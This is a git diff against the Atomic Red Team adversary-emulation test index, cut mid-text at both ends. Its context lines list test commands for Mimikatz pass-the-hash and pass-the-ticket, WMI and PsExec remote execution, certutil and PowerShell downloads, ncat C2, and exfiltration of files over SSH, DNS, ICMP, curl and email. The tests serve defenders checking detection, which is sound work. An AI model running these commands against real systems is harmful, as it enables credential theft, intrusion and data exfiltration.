\"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" @@ -65488,7 +65488,7 @@ execution: cleanup_command: 'Remove-Item "$env:TEMP\atomic_t1059_005_test_output.bin" -ErrorAction Ignore - ' +' name: powershell T1059.003: technique: @@ -65539,7 +65539,7 @@ execution: description: 'Creates and executes a simple batch script. Upon execution, CMD will briefly launch to run the batch script then close again. - ' +' supported_platforms: - windows input_arguments: 
@@ -65555,27 +65555,27 @@ execution: dependencies: - description: 'Batch file must exist on disk at specified location (#{script_path}) - ' +' prereq_command: 'if (Test-Path #{script_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item #{script_path} -Force | Out-Null Set-Content -Path #{script_path} -Value "#{command_to_execute}" executor: command: 'Start-Process #{script_path} - ' +' cleanup_command: 'Remove-Item #{script_path} -Force -ErrorAction Ignore - ' +' name: powershell - name: Writes text to a file and displays it. auto_generated_guid: 127b4afe-2346-4192-815c-69042bec570e description: 'Writes text to a file and display the results. This test is intended to emulate the dropping of a malicious file to disk. - ' +' supported_platforms: - windows input_arguments: @@ -65590,17 +65590,17 @@ execution: executor: command: 'echo "#{message}" > "#{file_contents_path}" & type "#{file_contents_path}" - ' +' cleanup_command: 'del "#{file_contents_path}" >nul 2>&1 - ' +' name: command_prompt - name: Suspicious Execution via Windows Command Shell auto_generated_guid: d0eb3597-a1b3-4d65-b33b-2cda8d397f20 description: 'Command line executed via suspicious invocation. Example is from the 2021 Threat Detection Report by Red Canary. - ' +' supported_platforms: - windows input_arguments: @@ -65691,7 +65691,7 @@ execution: executor: command: 'wmic useraccount get /ALL /format:csv - ' +' name: command_prompt - name: WMI Reconnaissance Processes auto_generated_guid: 5750aa16-0e59-4410-8b9a-8a47ca2788e2 @@ -65703,7 +65703,7 @@ execution: executor: command: 'wmic process get caption,executablepath,commandline /format:csv - ' +' name: command_prompt - name: WMI Reconnaissance Software auto_generated_guid: 718aebaa-d0e0-471a-8241-c5afa69c7414 
@@ -65715,7 +65715,7 @@ execution: executor: command: 'wmic qfe get description,installedOn /format:csv - ' +' name: command_prompt - name: WMI Reconnaissance List Remote Services auto_generated_guid: 0fd48ef7-d890-4e93-a533-f7dedd5191d3 @@ -65739,7 +65739,7 @@ execution: executor: command: 'wmic /node:"#{node}" service where (caption like "%#{service_search_string}%") - ' +' name: command_prompt - name: WMI Execute Local Process auto_generated_guid: b3bdfc91-b33e-4c6d-a5c8-d64bee0276b3 @@ -65756,11 +65756,11 @@ execution: executor: command: 'wmic process call create #{process_to_execute} - ' +' cleanup_command: 'wmic process where name=''#{process_to_execute}'' delete >nul 2>&1 - ' +' name: command_prompt - name: WMI Execute Remote Process auto_generated_guid: 9c8ef159-c666-472f-9874-90c8d60d136b @@ -65791,11 +65791,11 @@ execution: command: 'wmic /user:#{user_name} /password:#{password} /node:"#{node}" process call create #{process_to_execute} - ' +' cleanup_command: 'wmic /user:#{user_name} /password:#{password} /node:"#{node}" process where name=''#{process_to_execute}'' delete >nul 2>&1 - ' +' name: command_prompt - name: Create a Process using WMI Query and an Encoded Command auto_generated_guid: 7db7a7f9-9531-4840-9b30-46220135441c @@ -65812,7 +65812,7 @@ execution: executor: command: 'powershell -exec bypass -e SQBuAHYAbwBrAGUALQBXAG0AaQBNAGUAdABoAG8AZAAgAC0AUABhAHQAaAAgAHcAaQBuADMAMgBfAHAAcgBvAGMAZQBzAHMAIAAtAE4AYQBtAGUAIABjAHIAZQBhAHQAZQAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIABuAG8AdABlAHAAYQBkAC4AZQB4AGUA - ' +' name: command_prompt - name: Create a Process using obfuscated Win32_Process auto_generated_guid: 10447c83-fc38-462a-a936-5102363b1c43 @@ -65846,7 +65846,7 @@ execution: description: 'This test uses wmic.exe to execute a DLL function using rundll32. Specify a valid value for remote IP using the node parameter. - ' +' supported_platforms: - windows input_arguments: 
@@ -65870,12 +65870,12 @@ execution: get_prereq_command: 'Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/bin/calc.dll?raw=true" -OutFile "#{dll_to_execute}" - ' +' executor: command: 'wmic /node:#{node} process call create "rundll32.exe #{dll_to_execute} #{function_to_execute}" - ' +' cleanup_command: taskkill /f /im calculator.exe name: powershell - name: Application uninstall using WMIC @@ -66198,7 +66198,7 @@ lateral-movement: command: '[activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Document.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7") - ' +' name: powershell T1210: technique: @@ -66451,7 +66451,7 @@ lateral-movement: - description: 'Mimikatz executor must exist on disk and at specified location (#{mimikatz_path}) - ' +' prereq_command: | $mimikatz_path = cmd /c echo #{mimikatz_path} if (Test-Path $mimikatz_path) {exit 0} else {exit 1} @@ -66466,13 +66466,13 @@ lateral-movement: command: '#{mimikatz_path} "sekurlsa::pth /user:#{user_name} /domain:#{domain} /ntlm:#{ntlm}" - ' +' name: command_prompt - name: crackmapexec Pass the Hash auto_generated_guid: eb05b028-16c8-4ad8-adea-6f5b219da9a9 description: 'command execute with crackmapexec - ' +' supported_platforms: - windows input_arguments: @@ -66501,14 +66501,14 @@ lateral-movement: - description: 'CrackMapExec executor must exist on disk at specified location (#{crackmapexec_exe}) - ' +' prereq_command: 'if(Test-Path #{crackmapexec_exe}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Write-Host Automated installer not implemented yet, please install crackmapexec manually at this location: #{crackmapexec_exe} - ' +' executor: command: "#{crackmapexec_exe} #{domain} -u #{user_name} -H #{ntlm} -x #{command}\n" name: command_prompt 
@@ -66589,7 +66589,7 @@ lateral-movement: auto_generated_guid: dbf38128-7ba7-4776-bedf-cc2eed432098 description: 'Similar to PTH, but attacking Kerberos - ' +' supported_platforms: - windows input_arguments: @@ -66597,7 +66597,7 @@ lateral-movement: description: Ticket file name usually format of 'id-username\@domain.kirbi' (e.g. can be dumped by "sekurlsa::tickets /export" module) type: String - default: + default: mimikatz_exe: description: Path of the Mimikatz binary type: Path @@ -66606,10 +66606,10 @@ lateral-movement: dependencies: - description: 'Mimikatz must exist on disk at specified location (#{mimikatz_exe}) - ' +' prereq_command: 'if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1} - ' +' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href @@ -66620,7 +66620,7 @@ lateral-movement: executor: command: '#{mimikatz_exe} "kerberos::ptt #{ticket}" - ' +' name: command_prompt - name: Rubeus Kerberos Pass The Ticket auto_generated_guid: a2fc4ec5-12c6-4fb4-b661-961f23f359cb @@ -66663,19 +66663,19 @@ lateral-movement: dependencies: - description: 'Rubeus must exist on disk at specified location (#{rubeus_path}) - ' +' prereq_command: 'if (Test-Path #{rubeus_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{rubeus_path} - ' +' - description: 'PsExec must exist on disk at specified location (#{psexec_path}) - ' +' prereq_command: 'if (Test-Path #{psexec_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force 
@@ -66769,7 +66769,7 @@ lateral-movement: net start sesshijack cleanup_command: 'sc.exe delete sesshijack >nul 2>&1 - ' +' name: command_prompt elevation_required: true T1021.001: @@ -66841,7 +66841,7 @@ lateral-movement: auto_generated_guid: 355d4632-8cb9-449d-91ce-b566d0253d3e description: 'Attempt an RDP session via Remote Desktop Application to a DomainController. - ' +' supported_platforms: - windows input_arguments: @@ -66864,15 +66864,15 @@ lateral-movement: dependencies: - description: 'Computer must be domain joined - ' +' prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) { exit 0} else { exit 1} - ' +' get_prereq_command: 'Write-Host Joining this computer to a domain must be done manually - ' +' executor: command: | $Server=#{logonserver} @@ -66889,7 +66889,7 @@ lateral-movement: auto_generated_guid: 7382a43e-f19c-46be-8f09-5c63af7d3e2b description: 'Attempt an RDP session via Remote Desktop Application over Powershell - ' +' supported_platforms: - windows input_arguments: @@ -66922,7 +66922,7 @@ lateral-movement: description: 'Changing RDP Port to Non Standard Port via Remote Desktop Application over Powershell - ' +' supported_platforms: - windows input_arguments: @@ -66946,7 +66946,7 @@ lateral-movement: auto_generated_guid: 74ace21e-a31c-4f7d-b540-53e4eb6d1f73 description: 'Changing RDP Port to Non Standard Port via Command_Prompt - ' +' supported_platforms: - windows input_arguments: @@ -67227,7 +67227,7 @@ lateral-movement: auto_generated_guid: 3386975b-367a-4fbb-9d77-4dcf3639ffd3 description: 'Connecting To Remote Shares - ' +' supported_platforms: - windows input_arguments: 
@@ -67251,13 +67251,13 @@ lateral-movement: command: 'cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}" - ' +' name: command_prompt - name: Map Admin Share PowerShell auto_generated_guid: 514e9cd7-9207-4882-98b1-c8f791bae3c5 description: 'Map Admin share utilizing PowerShell - ' +' supported_platforms: - windows input_arguments: @@ -67276,14 +67276,14 @@ lateral-movement: executor: command: 'New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name} - ' +' name: powershell - name: Copy and Execute File with PsExec auto_generated_guid: 0eb03d41-79e4-4393-8e57-6344856be1cf description: 'Copies a file to a remote host and executes it using PsExec. Requires the download of PsExec from [https://docs.microsoft.com/en-us/sysinternals/downloads/psexec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec). - ' +' supported_platforms: - windows input_arguments: @@ -67304,10 +67304,10 @@ lateral-movement: - description: 'PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_exe}) - ' +' prereq_command: 'if (Test-Path "#{psexec_exe}") { exit 0} else { exit 1} - ' +' get_prereq_command: | Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force @@ -67337,7 +67337,7 @@ lateral-movement: command: 'cmd.exe /Q /c #{command_to_execute} 1> \\127.0.0.1\ADMIN$\#{output_file} 2>&1 - ' +' name: command_prompt elevation_required: true T1021.004: @@ -67568,7 +67568,7 @@ lateral-movement: description: 'An adversary may use Radmin Viewer Utility to remotely control Windows device, this will start the radmin console. - ' +' supported_platforms: - windows input_arguments: 
@@ -67584,10 +67584,10 @@ lateral-movement: - description: 'Radmin Viewer Utility must be installed at specified location (#{radmin_exe}) - ' +' prereq_command: 'if not exist "#{radmin_exe}" (exit /b 1) - ' +' get_prereq_command: | echo Downloading radmin installer bitsadmin /transfer myDownloadJob /download /priority normal "https://www.radmin.com/download/Radmin_Viewer_3.5.2.1_EN.msi" #{radmin_installer} @@ -67880,7 +67880,7 @@ lateral-movement: executor: command: 'Enable-PSRemoting -Force - ' +' name: powershell elevation_required: true - name: Invoke-Command @@ -67903,7 +67903,7 @@ lateral-movement: executor: command: 'invoke-command -ComputerName #{host_name} -scriptblock {#{remote_command}} - ' +' name: powershell - name: WinRM Access with Evil-WinRM auto_generated_guid: efe86d95-44c4-4509-ae42-7bfd9d1f5b3d @@ -68264,7 +68264,7 @@ command-and-control: "#{query_type}" "#{subdomain}.$(Get-Random -Minimum 1 -Maximum 999999).#{domain}" -QuickTimeout} - ' +' name: powershell - name: DNS Regular Beaconing auto_generated_guid: 3efc144e-1af8-46bb-8ca2-1376bb6db8b6 @@ -69062,7 +69062,7 @@ command-and-control: auto_generated_guid: 0fc6e977-cb12-44f6-b263-2824ba917409 description: 'Utilize rsync to perform a remote file copy (push) - ' +' supported_platforms: - linux - macos @@ -69086,13 +69086,13 @@ command-and-control: executor: command: 'rsync -r #{local_path} #{username}@#{remote_host}:#{remote_path} - ' +' name: bash - name: rsync remote file copy (pull) auto_generated_guid: 3180f7d5-52c0-4493-9ea0-e3431a84773f description: 'Utilize rsync to perform a remote file copy (pull) - ' +' supported_platforms: - linux - macos @@ -69116,13 +69116,13 @@ command-and-control: executor: command: 'rsync -r #{username}@#{remote_host}:#{remote_path} #{local_path} - ' +' name: bash - name: scp remote file copy (push) auto_generated_guid: 83a49600-222b-4866-80a0-37736ad29344 description: 'Utilize scp to perform a remote file copy (push) - ' +' supported_platforms: - linux - macos 
@@ -69146,13 +69146,13 @@ command-and-control: executor: command: 'scp #{local_file} #{username}@#{remote_host}:#{remote_path} - ' +' name: bash - name: scp remote file copy (pull) auto_generated_guid: b9d22b9a-9778-4426-abf0-568ea64e9c33 description: 'Utilize scp to perform a remote file copy (pull) - ' +' supported_platforms: - linux - macos @@ -69176,13 +69176,13 @@ command-and-control: executor: command: 'scp #{username}@#{remote_host}:#{remote_file} #{local_path} - ' +' name: bash - name: sftp remote file copy (push) auto_generated_guid: f564c297-7978-4aa9-b37a-d90477feea4e description: 'Utilize sftp to perform a remote file copy (push) - ' +' supported_platforms: - linux - macos @@ -69206,13 +69206,13 @@ command-and-control: executor: command: 'sftp #{username}@#{remote_host}:#{remote_path} <<< $''put #{local_file}'' - ' +' name: bash - name: sftp remote file copy (pull) auto_generated_guid: '0139dba1-f391-405e-a4f5-f3989f2c88ef' description: 'Utilize sftp to perform a remote file copy (pull) - ' +' supported_platforms: - linux - macos @@ -69236,14 +69236,14 @@ command-and-control: executor: command: 'sftp #{username}@#{remote_host}:#{remote_file} #{local_path} - ' +' name: bash - name: certutil download (urlcache) auto_generated_guid: dd3b61dd-7bbc-48cd-ab51-49ad1a776df0 description: 'Use certutil -urlcache argument to download a file from the web. Note - /urlcache also works! - ' +' supported_platforms: - windows input_arguments: @@ -69258,17 +69258,17 @@ command-and-control: executor: command: 'cmd /c certutil -urlcache -split -f #{remote_file} #{local_path} - ' +' cleanup_command: 'del #{local_path} >nul 2>&1 - ' +' name: command_prompt - name: certutil download (verifyctl) auto_generated_guid: ffd492e3-0455-4518-9fb1-46527c9f241b description: 'Use certutil -verifyctl argument to download a file from the web. Note - /verifyctl also works! - ' +' supported_platforms: - windows input_arguments: 
@@ -69290,7 +69290,7 @@ command-and-control: cleanup_command: 'Remove-Item "certutil-$(Get-Date -format yyyy_MM_dd)" -Force -Recurse -ErrorAction Ignore - ' +' name: powershell - name: Windows - BITSAdmin BITS Download auto_generated_guid: a1921cd3-9a2d-47d5-a891-f1d0f2a7a31b @@ -69316,7 +69316,7 @@ command-and-control: command: 'C:\Windows\System32\bitsadmin.exe /transfer #{bits_job_name} /Priority HIGH #{remote_file} #{local_path} - ' +' name: command_prompt - name: Windows - PowerShell Download auto_generated_guid: 42dc4460-9aa6-45d3-b1a6-3955d34e1fe8 @@ -69338,17 +69338,17 @@ command-and-control: command: '(New-Object System.Net.WebClient).DownloadFile("#{remote_file}", "#{destination_path}") - ' +' cleanup_command: 'Remove-Item #{destination_path} -Force -ErrorAction Ignore - ' +' name: powershell - name: OSTAP Worming Activity auto_generated_guid: 2ca61766-b456-4fcf-a35a-1233685e1cad description: 'OSTap copies itself in a specfic way to shares and secondary drives. This emulates the activity. - ' +' supported_platforms: - windows input_arguments: @@ -69425,7 +69425,7 @@ command-and-control: auto_generated_guid: c99a829f-0bb8-4187-b2c6-d47d1df74cab description: 'Download a remote file using the whois utility - ' +' supported_platforms: - linux - macos 
@@ -69453,29 +69453,29 @@ command-and-control: dependencies: - description: 'The whois and timeout commands must be present - ' +' prereq_command: 'which whois && which timeout - ' +' get_prereq_command: 'echo "Please install timeout and the whois package" - ' +' executor: name: sh elevation_required: false command: 'timeout --preserve-status #{timeout} whois -h #{remote_host} -p #{remote_port} "#{query}" > #{output_file} - ' +' cleanup_command: 'rm -f #{output_file} - ' +' - name: File Download via PowerShell auto_generated_guid: 54a4daf1-71df-4383-9ba7-f1a295d8b6d2 description: 'Use PowerShell to download and write an arbitrary file from the internet. Example is from the 2021 Threat Detection Report by Red Canary. - ' +' supported_platforms: - windows input_arguments: @@ -69509,7 +69509,7 @@ command-and-control: name: command_prompt command: 'finger base64_filedata@#{remote_host} - ' +' - name: Download a file with IMEWDBLD.exe auto_generated_guid: 1a02df58-09af-4064-a765-0babe1a0d1e2 description: | @@ -69557,10 +69557,10 @@ command-and-control: dependencies: - description: 'Curl must be installed on system. - ' +' prereq_command: 'if (Test-Path #{curl_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | Invoke-WebRequest "https://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip" -Outfile $env:temp\curl.zip Expand-Archive -Path $env:temp\curl.zip -DestinationPath $env:temp\curl @@ -69603,10 +69603,10 @@ command-and-control: dependencies: - description: 'Curl must be installed on system. - ' +' prereq_command: 'if (Test-Path #{curl_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | Invoke-WebRequest “https://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip” -Outfile $env:temp\curl.zip Expand-Archive -Path $env:temp\curl.zip -DestinationPath $env:temp\curl 
@@ -69615,13 +69615,13 @@ command-and-control: Remove-Item $env:temp\curl.zip - description: 'A file must be created to upload - ' +' prereq_command: 'if (Test-Path #{file_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'echo "This is an Atomic Test File" > #{file_path} - ' +' executor: command: | #{curl_path} -T #{file_path} #{remote_destination} @@ -69719,7 +69719,7 @@ command-and-control: executor: command: 'export #{proxy_scheme}_proxy=#{proxy_server} - ' +' cleanup_command: | unset http_proxy unset https_proxy @@ -70108,10 +70108,10 @@ command-and-control: dependencies: - description: 'ncat.exe must be available at specified location (#{ncat_exe}) - ' +' prereq_command: 'if( Test-Path "#{ncat_exe}") {exit 0} else {exit 1} - ' +' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 New-Item -ItemType Directory -Force -Path #{ncat_path} | Out-Null @@ -70125,7 +70125,7 @@ command-and-control: executor: command: 'cmd /c #{ncat_exe} #{server_ip} #{server_port} - ' +' name: powershell - name: Powercat C2 auto_generated_guid: 3e0e0e7f-6aa2-4a61-b61d-526c2cc9330e @@ -70274,13 +70274,13 @@ command-and-control: executor: command: 'Test-NetConnection -ComputerName #{domain} -port #{port} - ' +' name: powershell - name: Testing usage of uncommonly used port auto_generated_guid: 5db21e1d-dd9c-4a50-b885-b1e748912767 description: 'Testing uncommonly used port utilizing telnet. - ' +' supported_platforms: - linux - macos @@ -70296,7 +70296,7 @@ command-and-control: executor: command: 'telnet #{domain} #{port} - ' +' name: sh T1102.003: technique: @@ -70538,7 +70538,7 @@ command-and-control: -Minimum 1 -Maximum 999999).#{domain}&type=#{query_type}" -UseBasicParsing).Content } - ' +' name: powershell - name: DNS over HTTPS Regular Beaconing auto_generated_guid: 0c5f9705-c575-42a6-9609-cbbff4b2fc9b 
@@ -70728,7 +70728,7 @@ command-and-control: and using this to maintain access to the machine. Download of TeamViewer installer will be at the destination location when sucessfully executed. - ' +' supported_platforms: - windows executor: @@ -70749,7 +70749,7 @@ command-and-control: and use to establish C2. Download of AnyDesk installer will be at the destination location and ran when sucessfully executed. - ' +' supported_platforms: - windows executor: @@ -70768,7 +70768,7 @@ command-and-control: and use to establish C2. Download of LogMeIn installer will be at the destination location and ran when sucessfully executed. - ' +' supported_platforms: - windows executor: @@ -70788,7 +70788,7 @@ command-and-control: and use to establish C2. Download of GoToAssist installer will be at the destination location and ran when sucessfully executed. - ' +' supported_platforms: - windows executor: @@ -70874,7 +70874,7 @@ command-and-control: auto_generated_guid: 1164f70f-9a88-4dff-b9ff-dc70e7bf0c25 description: 'Utilizing a common technique for posting base64 encoded data. - ' +' supported_platforms: - macos - linux @@ -71180,7 +71180,7 @@ command-and-control: - description: "Curl must be installed on system \n" prereq_command: 'if (Test-Path #{curl_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | Invoke-WebRequest "https://curl.haxx.se/windows/dl-7.71.1/curl-7.71.1-win32-mingw.zip" -Outfile $env:temp\curl.zip Expand-Archive -Path $env:temp\curl.zip -DestinationPath $env:temp\curl @@ -71385,7 +71385,7 @@ exfiltration: auto_generated_guid: ab936c51-10f4-46ce-9144-e02137b2016a description: 'Take a file/directory, split it into 5Mb chunks - ' +' supported_platforms: - macos - linux 
@@ -71404,12 +71404,12 @@ exfiltration: prereq_command: 'if [ ! -f #{folder_path}/#{file_name} ]; then exit 1; else exit 0; fi; - ' +' get_prereq_command: 'if [ ! -d #{folder_path} ]; then mkdir -p #{folder_path}; touch #{folder_path}/safe_to_delete; fi; dd if=/dev/urandom of=#{folder_path}/#{file_name} bs=25000000 count=1 - ' +' executor: command: | cd #{folder_path}; split -b 5000000 #{file_name} @@ -71417,7 +71417,7 @@ exfiltration: cleanup_command: 'if [ -f #{folder_path}/safe_to_delete ]; then rm -rf #{folder_path}; fi; - ' +' name: sh T1048: technique: @@ -71496,7 +71496,7 @@ exfiltration: executor: command: 'ssh #{domain} "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz - ' +' name: sh - name: Exfiltration Over Alternative Protocol - SSH auto_generated_guid: 7c3cb337-35ae-4d06-bf03-3032ed2ec268 @@ -71526,7 +71526,7 @@ exfiltration: command: 'tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh #{user_name}@#{domain} ''cat > /Users.tar.gz.enc'' - ' +' name: sh - name: DNSExfiltration (doh) auto_generated_guid: c943d285-ada3-45ca-b3aa-7cd6500c6a48 @@ -71562,20 +71562,20 @@ exfiltration: description: Set to '-b32' to use base32 encoding of data. Might be required by some DNS resolvers. type: String - default: + default: dependency_executor_name: powershell dependencies: - description: 'DNSExfiltrator powershell file must exist on disk at specified location (#{ps_module}) - ' +' prereq_command: 'if (Test-Path #{ps_module}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'IWR "https://raw.githubusercontent.com/Arno0x/DNSExfiltrator/8faa972408b0384416fffd5b4d42a7aa00526ca8/Invoke-DNSExfiltrator.ps1" -OutFile #{ps_module} - ' +' executor: command: | Import-Module #{ps_module} @@ -71639,7 +71639,7 @@ exfiltration: auto_generated_guid: 1cdf2fb0-51b6-4fd8-96af-77020d5f1bf0 description: 'Exfiltrate data HTTPS using curl to file share site file.io - ' +' supported_platforms: - windows input_arguments: 
@@ -71655,10 +71655,10 @@ exfiltration: dependencies: - description: 'Curl must be installed on system. - ' +' prereq_command: 'if (Test-Path #{curl_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | Invoke-WebRequest "https://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip" -Outfile $env:temp\curl.zip Expand-Archive -Path $env:temp\curl.zip -DestinationPath $env:temp\curl @@ -71674,7 +71674,7 @@ exfiltration: auto_generated_guid: 4a4f31e2-46ea-4c26-ad89-f09ad1d5fe01 description: 'Exfiltrate data HTTPS using curl to file share site file.io - ' +' supported_platforms: - macos - linux @@ -71775,7 +71775,7 @@ exfiltration: auto_generated_guid: d1253f6e-c29b-49dc-b466-2147a6191932 description: 'Exfiltrates a file present on the victim machine to the C2 server. - ' +' supported_platforms: - windows input_arguments: @@ -72028,13 +72028,13 @@ exfiltration: in Get-Content -Path #{input_file} -Encoding Byte -ReadCount 1024) { $ping.Send("#{ip_address}", 1500, $Data) } - ' +' name: powershell - name: Exfiltration Over Alternative Protocol - DNS auto_generated_guid: c403b5a4-b5fc-49f2-b181-d1c80d27db45 description: 'Exfiltration of specified file over DNS protocol. - ' +' supported_platforms: - linux executor: @@ -72079,7 +72079,7 @@ exfiltration: command: 'Send-MailMessage -From #{sender} -To #{receiver} -Subject "T1048.003 Atomic Test" -Attachments #{input_file} -SmtpServer #{smtp_server} - ' +' name: powershell input_arguments: input_file: @@ -72482,7 +72482,7 @@ initial-access: description: 'GCP Service Accounts can be used to gain intial access as well as maintain persistence inside Google Cloud. - ' +' supported_platforms: - google-workspace - windows 
@@ -72517,20 +72517,20 @@ initial-access: cleanup_command: 'gcloud iam service-accounts delete #{service-account-email} --quiet - ' +' dependency_executor_name: gcloud dependencies: - description: 'Requires gcloud - ' +' prereq_command: 'if [ -x "$(command -v gcloud)" ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'echo "Please Install Google Cloud SDK before running this atomic test : https://cloud.google.com/sdk/docs/install" - ' +' T1195.003: technique: external_references: @@ -72768,7 +72768,7 @@ initial-access: description: 'The Adversaries can activate the default Guest user. The guest account is inactivated by default - ' +' supported_platforms: - windows input_arguments: @@ -72779,10 +72779,10 @@ initial-access: executor: command: 'net user #{guest_user} /active:yes - ' +' cleanup_command: 'net user #{guest_user} /active:no - ' +' name: command_prompt elevation_required: true T1078.002: @@ -73096,7 +73096,7 @@ initial-access: description: 'Running Chrome VPN Extensions via the Registry install 2 vpn extension, please see "T1133\src\list of vpn extension.txt" to view complete list - ' +' supported_platforms: - windows input_arguments: @@ -73109,12 +73109,12 @@ initial-access: type: String default: '"fcfhplploccackoneaefokcmbjfbkenj", "fdcgdnkidjaadafnichfpabhfomcebme" - ' +' dependency_executor_name: powershell dependencies: - description: 'Chrome must be installed - ' +' prereq_command: if ((Test-Path "C:\Program Files\Google\Chrome\Application\chrome.exe") -Or (Test-Path "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe")) {exit 0} else {exit 1} @@ -73483,7 +73483,7 @@ initial-access: cleanup_command: 'Remove-Item $env:TEMP\PhishingAttachment.xlsm -ErrorAction Ignore - ' +' - name: Word spawned a command shell and used an IP address in the command line auto_generated_guid: cbb6799a-425c-4f83-9194-5447a909d67f description: | 
@@ -73495,7 +73495,7 @@ initial-access: jse_path: description: 'Path for the macro to write out the "malicious" .jse file - ' +' type: String default: C:\Users\Public\art.jse ms_product: @@ -73506,7 +73506,7 @@ initial-access: dependencies: - description: 'Microsoft #{ms_product} must be installed - ' +' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -73517,7 +73517,7 @@ initial-access: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" - ' +' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -73526,7 +73526,7 @@ initial-access: Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}" cleanup_command: 'Remove-Item #{jse_path} -ErrorAction Ignore - ' +' name: powershell T1566.002: technique:
From 5b28237584d74d716f2e4a337c2946ee51dfe295 Mon Sep 17 00:00:00 2001
From: Jose Enrique Hernandez
Date: Mon, 31 Jan 2022 17:59:15 -0500
Subject: [PATCH 10/11] Add links to navigator (#1752)
* added link object, removed comments
* only adds links when parent technique actually has a yaml
Co-authored-by: Carrie Roberts
---
.../art-navigator-layer-azure-ad.json | 2 +-
.../art-navigator-layer-containers.json | 1 -
.../art-navigator-layer-google-workspace.json | 2 +-
.../art-navigator-layer-iaas.json | 2 +-
.../art-navigator-layer-linux.json | 2 +-
.../art-navigator-layer-macos.json | 2 +-
.../art-navigator-layer-office-365.json | 1 -
.../art-navigator-layer-windows.json | 1 -
.../art-navigator-layer.json | 1 -
atomics/Indexes/index.yaml | 4140 ++++++++---------
bin/generate-atomic-docs.rb | 22 +-
11 files changed, 2095 insertions(+), 2081 deletions(-)
diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-azure-ad.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-azure-ad.json
index 0ccf8d24..8b137891 100644
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-azure-ad.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-azure-ad.json
@@ -1 +1 @@ -{"version":"4.3","name":"Atomic Red Team (Azure-AD)","description":"Atomic Red Team (Azure-AD) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1098.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1110.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1110","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1484.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"}]},{"techniqueID":"T1484","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"}]},{"techniqueID":"T1606.002","score":100,"enabled":true,"links":[{"label":"View 
